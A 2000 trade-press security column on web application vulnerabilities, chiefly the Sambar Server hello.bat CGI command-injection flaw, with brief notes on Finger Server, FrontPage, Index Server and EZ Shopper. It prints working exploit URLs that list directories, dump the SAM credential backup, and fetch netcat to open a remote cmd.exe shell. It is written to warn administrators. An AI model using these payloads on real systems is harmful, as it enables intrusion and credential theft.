Security Watch: Application Hacks Grow

SAN MATEO (03/13/2000) - Unlike the recent DoS (denial of service) attacks on popular e-commerce Web sites, the art of application hacking is an elite skill.

Assessing a Web server along with its running software and the application's design, for example, and then formulating an attack based on possible weaknesses in design requires some significant thought and analysis, not to mention a thorough understanding of Web design and programming.

Unfortunately, much of this analysis requires a talent that most security administrators have not yet honed. Consider yourself forewarned: The number of application vulnerabilities is growing almost daily and there is no sign of it letting up. As administrators get smarter and harden their networks and systems, attackers are raising the stakes by moving up the stack and attacking the application itself. There is no time like the present to begin brushing up on your application hacking skills to find the holes in your network before some teenager does.

A few of the recent vulnerabilities have taken the fun out of Web hacking altogether. With a single command on one of these applications it is possible to execute remote commands; this reminds us that any system is one mistake away from complete compromise.

Sambar falls victim

After establishing a strong security record, the popular Windows NT and Windows 95/98 freeware Web server, Sambar Server from Sambar Technologies, has fallen victim to a devastating Web hack. Georgi Chorbadzhiiski and Nikolay Tsvetkov recently stumbled across a couple of CGI test files that can be used to execute any command on the target system. The files are Windows batch files named hello.bat and echo.bat and are included in the default installation of every Sambar version for NT that we've checked.

The real purpose behind including files like these in Web server distributions is to provide an easy way to confirm that CGI is working on a Web server. But this is precisely how many Web servers are compromised. Web server vendors will often include poorly written CGI programs in the distribution, making it easier to troubleshoot problems. And Sambar appears to be no exception to the rule.

What everyone fails to remember is that local command execution is an enormous problem. Once you can execute commands on a target system, the game is over.

The exploit is trivial to carry out. The syntax makes use of the usual "&" symbol as a parameter to the CGI script (in this case the batch file) and the "+" symbol as a space between parameters of your commands. By using this syntax, you can direct these CGI files to execute any command on the local system. The program execution choices are plentiful. Type the following in your browser to view the contents of any directory on the system: http:///cgi-bin/hello.bat?&dir+c:\Type the following to download the backup SAM (Security Accounts Manager) file: http:///cgi-bin/hello.bat?&type+c:\winnt\repair\sam._And finally, for the truly wicked, try this one to gain a command prompt: http:///cgi-bin/hello.bat?&tftp+i++GET+nc.exe+c:\nc.exe&c:\nc.exe+-l+-d+-p+4000+-e+cmd.exeThe easy fix is to remove the offensive batch files from the /cgi-bin directory.

Finger server

A number of other application vulnerabilities have recently hit the wire, including the Finger Server, Microsoft FrontPage Personal Web server, Microsoft Index Server, and EZ Shopper 3.0.

The Finger Server (for NT and Unix), by Daniel Beckham, allows an attacker to remotely execute any command. The FrontPage Personal Web server is reported to allow an attacker to view any file on the system with the use of the doubledot bug (which is actually four dots "...."). We have not gotten it to work in Windows 98 with FrontPage 4.02.0690; however, Version 3.0.2.926 has been reported vulnerable.

Index Server was reported to have a similar hole that would allow someone to view any file on the system and learn the directory structure of the Web server. And finally, EZ Shopper 3.0 (canned e-commerce software), by the Alex Heiphetz Group, has reported holes in their loadpage.cgi and search.cgi scripts. These also allow an attacker to remotely execute commands.

The mistake many administrators make is in believing that these attacks can be prevented with firewalls or intrusion detection. They cannot. All the attacks work by exploiting a Web server, which means that the attack runs over standard port 80 (HTTP) traffic and cannot be easily distinguished from normal, everyday traffic.

Let us know at security_watch@infoworld.com what you are doing about your application vulnerabilities.

Stuart McClure is president/CTO and Joel Scambray is a managing principal at Rampart Security Group (www.ramsec.com). They have encountered numerous technologies during their 10 years in information security. They recently wrote the security book Hacking Exposed (Osborne McGraw-Hill).

Join the newsletter!

Or

Sign up to gain exclusive access to email subscriptions, event invitations, competitions, giveaways, and much more.

Membership is free, and your security and privacy remain protected. View our privacy policy before signing up.

Error: Please check your email address.

More about CGIMicrosoftRampart Security GroupSambar Technologies

Show Comments